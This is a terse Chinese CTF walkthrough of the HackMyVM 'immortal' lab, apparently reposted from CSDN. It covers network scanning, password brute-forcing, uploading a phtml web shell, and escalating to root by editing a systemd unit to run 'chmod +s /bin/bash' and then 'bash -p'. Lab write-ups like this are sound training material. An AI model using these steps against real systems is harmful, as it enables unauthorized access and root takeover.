欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 汽车 > 新车 > hackmyvm-immortal

hackmyvm-immortal

2025/3/29 19:54:51 来源:https://blog.csdn.net/2301_80105510/article/details/146514476  浏览:    关键词:hackmyvm-immortal

arp-scan -l

nmap -sS -v 192.168.222.178

80端口

抓包,爆破出密码: santiago
莫斯电码,解密出来内容为NOTHIN7MPORTANT
获得一个关键信息——文件上传路径为
/upload_an_incredible_message.php
上传phtml木马
连接蚁剑
第一个flag
连接ssh,使用system可以连接上

sudo -l

使用nano编辑器编辑immortal.py,CTRL+O保存,CTRL+X退出

sudo -u eric /usr/bin/python3 /opt/immortal.py

-u eric 表示以用户 eric 的身份运行后续的命令。
该命令的具体作用是:
以用户 eric 的身份,使用 /usr/bin/python3 解释器,运行位于 /opt/immortal.py 的 Python 脚本。

sudo -l

sudoedit /etc/systemd/system/immortal.service

ExecStart=/usr/bin/chmod +s /bin/bash

sudo /usr/bin/systemctl stop immortal.service

sudo /usr/bin/systemctl start immortal.service

ls -l /bin/bash

bash -p

1.bash -p 的作用
  • 保留权限:-p 选项会阻止 Bash 在启动时重置有效用户 ID(EUID)和有效组 ID(EGID)。这意味着,如果以特权用户(如 root)身份启动 Bash,即使切换到普通用户,Bash 仍会保留特权用户的权限。
  • 保留环境变量:-p 选项还会阻止 Bash 在启动时重置环境变量(如 PATH、HOME 等),确保环境变量保持不变。
2. 使用场景
  • 特权操作:在某些情况下,需要在普通用户环境中执行特权操作,但又不想完全切换到特权用户。bash -p 可以保留特权用户的权限,方便执行这些操作。
  • 环境变量保留:如果需要在启动 Bash 时保留当前的环境变量设置,可以使用 -p 选项。

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词